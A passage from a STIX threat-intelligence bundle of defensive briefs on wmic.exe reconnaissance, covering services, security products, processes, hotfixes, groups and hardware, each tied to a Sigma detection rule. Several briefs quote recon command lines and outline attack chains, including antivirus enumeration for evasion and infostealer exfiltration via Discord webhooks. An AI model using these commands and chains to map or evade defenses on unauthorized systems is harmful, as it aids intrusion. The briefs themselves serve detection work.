      "description": "## Overview\n\nAdversaries frequently utilize built-in operating system tools to perform reconnaissance within a compromised environment, blending in with legitimate administrative activity. One such tool is `wmic.exe`, the Windows Management Instrumentation Command-line utility. Attackers specifically use `wmic.exe` to query service information on remote devices, often as an initial step to map network services, identify running applications, or detect potential vulnerabilities. This activity helps them understand the target's environment, aiding in decisions regarding lateral movement, privilege escalation, or further exploitation. The technique involves executing `wmic.exe` with specific commands targeting remote nodes and querying the \"service\" class, which can result in output indicating service availability or error messages if the host is unreachable or the service doesn't exist. This reconnaissance is a foundational step in many attack chains, allowing threat actors to gather crucial intelligence for subsequent stages.\n\n## Attack Chain\n\nThis brief focuses on a specific reconnaissance technique rather than a complete, multi-stage attack chain. The observed behavior centers on the execution of a single command-line utility for information gathering:\n\n1.  **Execution of WMIC for Service Query**: An attacker executes `wmic.exe` on a compromised host or directly from their attacking machine (if initial access is achieved through a different vector), targeting a remote system.\n2.  **Remote System Identification**: The command includes `/node:` parameter specifying the remote IP address or hostname to query.\n3.  **Service Class Query**: The `service` class is specified, indicating the attacker is interested in service-related information.\n4.  **Information Request**: Additional parameters like `list brief` or `get Caption,Name,State` are used to retrieve specific service attributes.\n5.  **Output Analysis**: The attacker parses the output, which lists running services, provides \"No instance(s) Available\" if a service is not found, or returns \"The RPC server is unavailable\" if the remote host is unreachable.\n6.  **Intelligence Gathering**: The collected service information helps the attacker identify running software, potential attack surfaces, or indicators of security tooling, informing subsequent attack decisions such as lateral movement or privilege escalation.\n\n## Impact\n\nWhile service reconnaissance via WMIC itself does not directly result in immediate damage or data loss, its successful execution provides adversaries with critical intelligence about the network environment. This information enables them to identify high-value targets, vulnerable services, or unpatched systems, significantly increasing the likelihood of successful lateral movement, privilege escalation, and ultimately, data exfiltration or system compromise. Failure to detect and respond to such reconnaissance activities allows attackers to progress undetected through their kill chain, potentially leading to widespread network disruption, ransomware deployment, or sensitive data theft.\n\n## Recommendation\n\n*   Deploy the Sigma rule included in this brief to your SIEM and tune for your environment to detect `wmic.exe` service reconnaissance.\n*   Enable Sysmon process-creation logging (Event ID 1) on all Windows endpoints and servers to ensure the necessary telemetry for the provided Sigma rule.\n*   Review network firewall and host-based firewall logs for unusual outbound connections to identify remote WMIC queries.\n",
      "published": "2026-07-03T14:52:01Z",
      "labels": [
        "windows",
        "reconnaissance",
        "wmic",
        "internal-recon"
      ],
      "object_refs": [
        "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/process_creation/proc_creation_win_wmic_recon_service.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md"
        },
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic"
        },
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/en-us/windows/win32/cimwin32prov/win32-service"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Windows Management Instrumentation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1047",
          "url": "https://attack.mitre.org/techniques/T1047"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--71d0f7f5-eb36-5920-9c55-cce25c667f2c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4a6c329e-0809-5b53-9ab8-e7f27a1414ff",
      "target_ref": "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "System Information Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1082",
          "url": "https://attack.mitre.org/techniques/T1082"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3d9dd3c9-636c-53af-afed-7ec54a57ea93",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4a6c329e-0809-5b53-9ab8-e7f27a1414ff",
      "target_ref": "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--4a6c329e-0809-5b53-9ab8-e7f27a1414ff",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Potential Product Class Reconnaissance Via Wmic.EXE",
      "description": "## Overview\n\nThis threat brief details the use of `wmic.exe` by adversaries for reconnaissance purposes, specifically to identify security products installed on Windows endpoints. While `wmic.exe` is a legitimate Windows utility, its command-line invocation to query product classes like `AntiVirusProduct`, `AntiSpywareProduct`, or `FirewallProduct` is a tactic often employed by malicious actors. This behavior allows attackers to gain insights into an organization's defensive posture, enabling them to choose appropriate evasion techniques, tailor their payloads, or attempt to disable security mechanisms. This activity is a common precursor to more impactful stages of an attack, such as payload delivery, lateral movement, or data exfiltration, highlighting the importance of detecting such discovery attempts early in the kill chain.\n\n## Attack Chain\n\n*This threat brief describes a specific discovery technique, not a full attack chain. No attack chain information is available from the provided source.*\n\n## Impact\n\nSuccessful reconnaissance of security products allows adversaries to adapt their attack methods, bypassing or disabling defensive controls more effectively. This significantly increases the likelihood of a successful compromise, which can lead to severe consequences such as system disruption, data theft, ransomware deployment, and financial losses. The ability to identify and circumvent security software undermines an organization's overall cyber defenses, potentially granting attackers unfettered access to sensitive data and critical systems.\n\n## Recommendation\n\n* Deploy the provided Sigma rule to your SIEM to detect `wmic.exe` executions for security product enumeration.\n* Ensure `process_creation` logging (e.g., via Sysmon) is enabled on all Windows endpoints to capture `CommandLine` arguments necessary for this detection.\n* Investigate all alerts generated by the `Potential Product Class Reconnaissance Via Wmic.EXE` rule, as they indicate potential adversarial discovery activities.\n",
      "published": "2026-07-03T14:51:15Z",
      "labels": [
        "reconnaissance",
        "discovery",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee",
        "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/process_creation/proc_creation_win_wmic_recon_product_class.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/albertzsigovits/malware-notes/blob/c820c7fea76cf76a861b28ebc77e06100e20ec29/Ransomware/Maze.md"
        },
        {
          "source_name": "reference",
          "url": "https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1"
        },
        {
          "source_name": "reference",
          "url": "https://www.trendmicro.com/en_us/research/25/c/socgholishs-intrusion-techniques-facilitate-distribution-of-rans.html"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Windows Management Instrumentation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1047",
          "url": "https://attack.mitre.org/techniques/T1047"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7d366602-57cc-541c-a154-3fa1b1048ede",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c7edf048-ea8e-5c48-8417-45a13a308ce7",
      "target_ref": "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "System Information Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1082",
          "url": "https://attack.mitre.org/techniques/T1082"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a865ef3b-5505-5195-a521-e05604d735bc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c7edf048-ea8e-5c48-8417-45a13a308ce7",
      "target_ref": "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--c7edf048-ea8e-5c48-8417-45a13a308ce7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "WMIC Product Reconnaissance for Defense Evasion",
      "description": "## Overview\n\nThis brief describes a common post-compromise reconnaissance technique where attackers leverage the legitimate Windows Management Instrumentation Command-line (WMIC) utility, specifically `wmic.exe`, to gather information about the software installed on a compromised system. Observed in various adversarial campaigns, including those outlined in The DFIR Report's 2022 year-in-review, this technique focuses on identifying security products such as firewalls and antivirus solutions. By understanding the defensive posture of the target system, threat actors can adapt their tactics, techniques, and procedures (TTPs) to evade detection, disable security controls, or exploit known vulnerabilities in specific applications. Detecting this activity early is critical for defenders to prevent further progression of an attack.\n\n## Attack Chain\n\n[The provided intelligence describes a single technique (WMIC reconnaissance) rather than a full, multi-stage attack chain from initial access to impact. Therefore, a detailed attack chain cannot be constructed for this brief.]\n\n## Impact\n\nSuccessful product reconnaissance provides attackers with critical intelligence to escalate privileges, evade defenses, and move laterally within a network. By knowing the specific security tools or applications present, adversaries can develop targeted exploits, bypass detection mechanisms, or uninstall/disable security software, significantly increasing the likelihood of successful data exfiltration, ransomware deployment, or long-term persistence without immediate detection.\n\n## Recommendation\n\n*   Deploy the \"Potential Product Reconnaissance Via Wmic.EXE\" Sigma rule to your SIEM.\n*   Enable Sysmon process-creation logging on all Windows endpoints to ensure the necessary telemetry for the above rule is collected.\n*   Investigate alerts from the Sigma rule for signs of further adversarial activity or follow-on actions indicative of defense evasion.\n",
      "published": "2026-07-03T14:50:18Z",
      "labels": [
        "reconnaissance",
        "defense-evasion",
        "windows",
        "wmic"
      ],
      "object_refs": [
        "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee",
        "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/process_creation/proc_creation_win_wmic_recon_product.yml"
        },
        {
          "source_name": "reference",
          "url": "https://thedfirreport.com/2023/03/06/2022-year-in-review/"
        },
        {
          "source_name": "reference",
          "url": "https://www.yeahhub.com/list-installed-programs-version-path-windows/"
        },
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/en-us/answers/questions/253555/software-list-inventory-wmic-product"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--b2ef40df-6911-5059-85e1-8e863224f8cd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Process Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1057",
          "url": "https://attack.mitre.org/techniques/T1057"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--847decca-6b4e-5b68-a0f6-57d900794e6a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5c350b4d-16f5-5356-95cd-24f41615e511",
      "target_ref": "attack-pattern--b2ef40df-6911-5059-85e1-8e863224f8cd"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Windows Management Instrumentation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1047",
          "url": "https://attack.mitre.org/techniques/T1047"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--051278a6-1c4e-5b87-8e37-fa21986fc258",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5c350b4d-16f5-5356-95cd-24f41615e511",
      "target_ref": "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--5c350b4d-16f5-5356-95cd-24f41615e511",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Potential Process Reconnaissance via Wmic.EXE",
      "description": "## Overview\n\nThis brief details the use of `wmic.exe` for process reconnaissance, a common tactic employed by adversaries to understand the environment of a compromised Windows system. While `wmic.exe` is a legitimate Windows utility, its specific invocation with the \"process\" keyword is frequently abused for discovery. This activity indicates an attacker is actively mapping out running processes, often looking for security software, vulnerable applications, or other indicators that could aid in privilege escalation, lateral movement, or establishing persistence. This technique is observed across various threat groups as a standard post-exploitation step, providing critical information to inform subsequent malicious actions. Detecting this behavior is crucial for early identification of reconnaissance activities before an attacker can progress to more impactful stages.\n\n## Impact\n\nThe successful use of `wmic.exe` for process reconnaissance itself does not directly cause immediate damage like data encryption or exfiltration. However, it provides adversaries with critical intelligence about the compromised system's operational landscape. This information can be leveraged to identify high-value targets, understand security control deployments, and discover opportunities for further exploitation or persistence. For instance, an attacker might identify vulnerable processes to inject malicious code, locate sensitive applications to target for data theft, or determine paths for privilege escalation. Failing to detect such reconnaissance can allow an attacker to proceed unchallenged, significantly increasing the risk of data compromise, system disruption, or financial loss.\n\n## Recommendation\n\n*   Deploy the provided Sigma rule \"Potential Process Reconnaissance via Wmic.EXE\" to your SIEM and tune for your environment to detect suspicious `wmic.exe` invocations.\n*   Ensure that Windows process creation logging, especially via Sysmon (Event ID 1), is enabled on all critical endpoints and servers to capture `CommandLine` arguments and `Image` paths for `wmic.exe`.\n*   Investigate alerts generated by the rule, focusing on the parent process that initiated `wmic.exe` to determine the source of the reconnaissance activity.\n*   Review the `CommandLine` of any `wmic.exe` process queries involving \"process\" that originate from non-standard user accounts or unexpected processes.\n",
      "published": "2026-07-03T14:49:34Z",
      "labels": [
        "reconnaissance",
        "discovery",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--b2ef40df-6911-5059-85e1-8e863224f8cd",
        "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/process_creation/proc_creation_win_wmic_recon_process.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md"
        },
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Windows Management Instrumentation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1047",
          "url": "https://attack.mitre.org/techniques/T1047"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7ae773ea-9436-5c62-a813-edc2e339dffa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--03189d9f-646d-5dea-81d5-6398f4b04eff",
      "target_ref": "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--03189d9f-646d-5dea-81d5-6398f4b04eff",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Windows Hotfix Updates Reconnaissance Via Wmic.EXE",
      "description": "## Overview\n\nThis threat brief focuses on the use of `wmic.exe` to gather information about installed hotfix updates on Windows systems. Specifically, the execution of `wmic.exe` with the \"qfe\" flag, as in `wmic qfe get Caption,HotFixID,InstalledOn`, is a known technique for system reconnaissance. Both legitimate pentesters and malicious attackers commonly employ this method to identify missing security patches and potential vulnerabilities that could be exploited for privilege escalation or further lateral movement. By understanding the patch level of a system, an adversary can tailor their exploitation attempts to known weaknesses, increasing their chances of success. This activity is a precursor to more damaging actions, making its detection crucial for early warning.\n\n## Impact\n\nThe immediate impact of this reconnaissance technique is information disclosure to the attacker regarding the patch status of a Windows system. While not directly destructive, successful enumeration of missing hotfixes can provide adversaries with critical intelligence to target specific unpatched vulnerabilities. This can lead to subsequent successful exploitation, system compromise, privilege escalation, data exfiltration, or the deployment of ransomware. The absence of proper patching, once identified by an attacker, drastically increases the risk of a full system takeover.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"Windows Hotfix Updates Reconnaissance Via Wmic.EXE\" provided in this brief to your SIEM and tune for your environment.\n*   Enable Sysmon process-creation logging to ensure the necessary `process_creation` events are captured for the detection rule.\n*   Regularly review `wmic.exe` command-line executions, particularly those querying system configurations like `qfe`, to identify unauthorized reconnaissance attempts.\n",
      "published": "2026-07-03T14:48:47Z",
      "labels": [
        "reconnaissance",
        "privilege-escalation",
        "windows",
        "attack.execution",
        "attack.t1047"
      ],
      "object_refs": [
        "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/process_creation/proc_creation_win_wmic_recon_hotfix.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat"
        },
        {
          "source_name": "reference",
          "url": "https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--9784d16a-c518-5b29-909d-468e2fd57dad",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Permission Groups Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1069",
          "url": "https://attack.mitre.org/techniques/T1069"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b540ecbf-79b0-5230-97fb-ed0823a0e81e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--cdcc5da2-ff26-5262-913d-9b64de02abae",
      "target_ref": "attack-pattern--9784d16a-c518-5b29-909d-468e2fd57dad"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--cdcc5da2-ff26-5262-913d-9b64de02abae",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Detect Local Groups Reconnaissance Using WMIC",
      "description": "## Overview\n\nThis brief details the use of `wmic.exe` for local group reconnaissance, a technique commonly employed by adversaries as part of their discovery phase. While `wmic.exe` is a legitimate Windows utility for system administration, its use with the \"group\" flag allows attackers to enumerate local system groups and their members. This activity typically aims to identify privileged accounts, such as local administrators, to facilitate privilege escalation or lateral movement within a compromised environment. The detection focuses on identifying this specific command-line execution pattern, providing security teams with visibility into potential reconnaissance attempts. This is a general technique detection rather than a specific campaign, but provides crucial early warning indicators for further adversary activity.\n\n## Attack Chain\n\nAs this brief focuses on a specific discovery technique rather than a complete attack campaign, a full attack chain cannot be provided. However, the use of `wmic.exe group` typically occurs after initial access has been established.\n\n1.  **Initial Access**: Adversary gains initial foothold on a Windows system (e.g., via phishing, exploit, RDP brute-force).\n2.  **Execution**: Adversary executes `wmic.exe` via command line or script.\n3.  **Discovery**: `wmic.exe group` is run to query local user groups.\n4.  **Information Gathering**: Attacker gathers information on group memberships, focusing on privileged groups like \"Administrators\".\n5.  **Target Identification**: Attacker identifies potential accounts for privilege escalation or lateral movement.\n6.  **Next Stage**: Attacker proceeds with further actions based on discovered information (e.g., credential dumping, lateral movement, privilege escalation).\n\n## Impact\n\nWhile the direct impact of local group reconnaissance using `wmic.exe` is limited to information disclosure, successful execution of this technique significantly aids adversaries in achieving their primary objectives. By identifying privileged accounts, attackers can more efficiently plan their privilege escalation and lateral movement strategies. The successful identification of administrator accounts can lead to full system compromise, data exfiltration, deployment of ransomware, or establishment of persistent access across the network. Without detection, this seemingly benign activity can lay the groundwork for severe and widespread damage.\n\n## Recommendation\n\n*   Deploy the Sigma rule in this brief to your SIEM and tune for your environment.\n*   Enable Sysmon process-creation logging to ensure the necessary telemetry for the rule is collected.\n*   Review any alerts generated by the `Detect Local Groups Reconnaissance Using WMIC` rule for suspicious `wmic.exe` activity, especially when originating from non-administrative contexts or uncommon user accounts.\n",
      "published": "2026-07-03T14:48:01Z",
      "labels": [
        "windows",
        "reconnaissance",
        "discovery"
      ],
      "object_refs": [
        "attack-pattern--9784d16a-c518-5b29-909d-468e2fd57dad"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/process_creation/proc_creation_win_wmic_recon_group.yml"
        }
      ],
      "confidence": 40
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Phishing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1566",
          "url": "https://attack.mitre.org/techniques/T1566"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3cff03c0-060b-56ca-b168-58f694cad60b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c19f4b63-a815-5307-9d08-d1c9b79b7f0c",
      "target_ref": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Windows Management Instrumentation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1047",
          "url": "https://attack.mitre.org/techniques/T1047"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--138cd136-167c-55c7-afdf-881a41eab45c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c19f4b63-a815-5307-9d08-d1c9b79b7f0c",
      "target_ref": "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d1e170cb-9fcd-59b9-b639-175e22225660",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c19f4b63-a815-5307-9d08-d1c9b79b7f0c",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "System Information Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1082",
          "url": "https://attack.mitre.org/techniques/T1082"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cb1ab9cc-643e-54da-af3d-5642ad6e67bc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c19f4b63-a815-5307-9d08-d1c9b79b7f0c",
      "target_ref": "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--fe1e140b-0e35-5f0d-a990-f0c9146cacb3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Gather Victim Host Information",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1592",
          "url": "https://attack.mitre.org/techniques/T1592"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0d9a3f84-5c93-5c4d-8c50-5928ba17dd62",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c19f4b63-a815-5307-9d08-d1c9b79b7f0c",
      "target_ref": "attack-pattern--fe1e140b-0e35-5f0d-a990-f0c9146cacb3"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over Web Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1567",
          "url": "https://attack.mitre.org/techniques/T1567"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8908dca6-973d-5172-9e6b-d8c0527ffc76",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c19f4b63-a815-5307-9d08-d1c9b79b7f0c",
      "target_ref": "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195"
    },
    {
      "type": "threat-actor",
      "spec_version": "2.1",
      "id": "threat-actor--8f34755b-a41f-5d6e-8363-2cb379118d65",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Kuraystealer"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b7ee98f0-f256-5549-9ac0-da25502b94a8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "attributed-to",
      "source_ref": "report--c19f4b63-a815-5307-9d08-d1c9b79b7f0c",
      "target_ref": "threat-actor--8f34755b-a41f-5d6e-8363-2cb379118d65"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--c19f4b63-a815-5307-9d08-d1c9b79b7f0c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Hardware Model Reconnaissance Via Wmic.EXE",
      "description": "## Overview\n\nAdversaries, particularly groups deploying infostealers like Kuraystealer, actively leverage legitimate built-in Windows utilities to perform reconnaissance without raising immediate suspicion. One such technique involves using `wmic.exe` with the `csproduct` command to query system hardware models, vendors, and versions. This method, identified in various threat reports including those detailing Kuraystealer's operations since at least 2023, allows attackers to quickly gather crucial details about the underlying infrastructure of compromised systems. This information is vital for post-exploitation activities, enabling tailored attacks, further exploitation based on specific hardware vulnerabilities, or confirming the value of a compromised system before proceeding with data exfiltration. The reliance on a native, often whitelisted, tool like WMIC makes detection challenging for defenders without specific process command-line logging and robust correlation rules.\n\n## Attack Chain\n\n1.  **Initial Access**: The victim downloads and executes a malicious payload, often disguised as legitimate software, initiating the Kuraystealer infection.\n2.  **Execution**: The Kuraystealer malware executes on the system, typically a .NET assembly, which then spawns child processes to perform its malicious activities.\n3.  **System Information Discovery**: The malware executes `wmic.exe csproduct get name,vendor,version,identifyingnumber` to gather detailed hardware model and vendor information about the compromised machine.\n4.  **Additional Reconnaissance**: Kuraystealer continues to use `wmic.exe` and other built-in commands to collect further system details, such as information about the processor, BIOS, and baseboard, to build a comprehensive system profile.\n5.  **Data Collection**: The infostealer actively searches for and collects sensitive data, including credentials from web browsers, cryptocurrency wallet files, and other specified personal information from the local system.\n6.  **Data Staging and Exfiltration**: Collected data is typically compressed into an archive (e.g., ZIP) and then exfiltrated to attacker-controlled infrastructure, often leveraging platforms like Discord webhooks.\n\n## Impact\n\nThe successful execution of WMIC for reconnaissance provides attackers with valuable insights into the target system's hardware, enabling them to customize subsequent attacks or determine the value of the compromised host. In the context of infostealers like Kuraystealer, this reconnaissance precedes the theft of sensitive data, including credentials, browser history, and cryptocurrency wallet information. This leads to severe financial and reputational damage for victims, as critical information is exfiltrated and potentially sold or misused. While specific victim counts for this particular reconnaissance technique are not isolated, the broader Kuraystealer campaigns have targeted a wide range of individuals and organizations globally, resulting in 